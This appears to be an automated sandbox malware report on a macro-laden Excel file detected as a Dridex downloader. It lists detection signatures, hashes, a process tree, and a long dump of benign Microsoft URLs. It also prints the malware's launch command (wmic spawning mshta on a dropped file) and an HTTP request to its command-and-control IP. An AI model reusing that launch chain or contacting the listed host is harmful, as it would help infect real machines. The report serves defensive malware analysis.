Loading ...

Play interactive tourEdit tour

Windows Analysis Report payment8642156.xlsb

Overview

General Information

Sample Name:payment8642156.xlsb
Analysis ID:528108
MD5:c0ba3e41c19da601eb852e9cd468012b
SHA1:151cad874dce5400b1cdb1a4f6114c296311f76a
SHA256:56e7b2005961a0726ac94e50ed03bfcad15700e3aee1be840ee2b827f7798680
Tags:xlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5028 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 6112 cmdline: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 7096 cmdline: mshta C:\ProgramData\XgQXeAWeoOU.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\XgQXeAWeoOU.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5028, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", ProcessId: 6112
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5028, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\XgQXeAWeoOU.rtf", ProcessId: 6112

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.4:49787 -> 132.148.135.183:8080
      Source: global trafficTCP traffic: 192.168.2.4:49787 -> 132.148.135.183:8080
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.4:49787 -> 132.148.135.183:8080
      Source: Joe Sandbox ViewIP Address: 132.148.135.183 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.aadrm.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.aadrm.com/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.cortana.ai
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.office.net
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.onedrive.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://augloop.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://augloop.office.com/v2
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://cdn.entity.
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://clients.config.office.net/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://config.edge.skype.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://cortana.ai
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://cortana.ai/api
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://cr.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://dev.cortana.ai
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://devnull.onenote.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://directory.services.
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://graph.windows.net
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://graph.windows.net/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://lifecycle.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://login.windows.local
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://management.azure.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://management.azure.com/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://messaging.office.com/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://ncus.contentsync.
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://officeapps.live.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://onedrive.live.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://osi.office.net
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://otelrules.azureedge.net
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://outlook.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://outlook.office.com/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://outlook.office365.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://outlook.office365.com/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://powerlift.acompli.net
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://roaming.edog.
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://settings.outlook.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://staging.cortana.ai
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://tasks.office.com
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 89313E5E-CC0C-4CD1-B945-313065E02B9E.1.drString found in binary or memory: https://webshell.suite.office.com
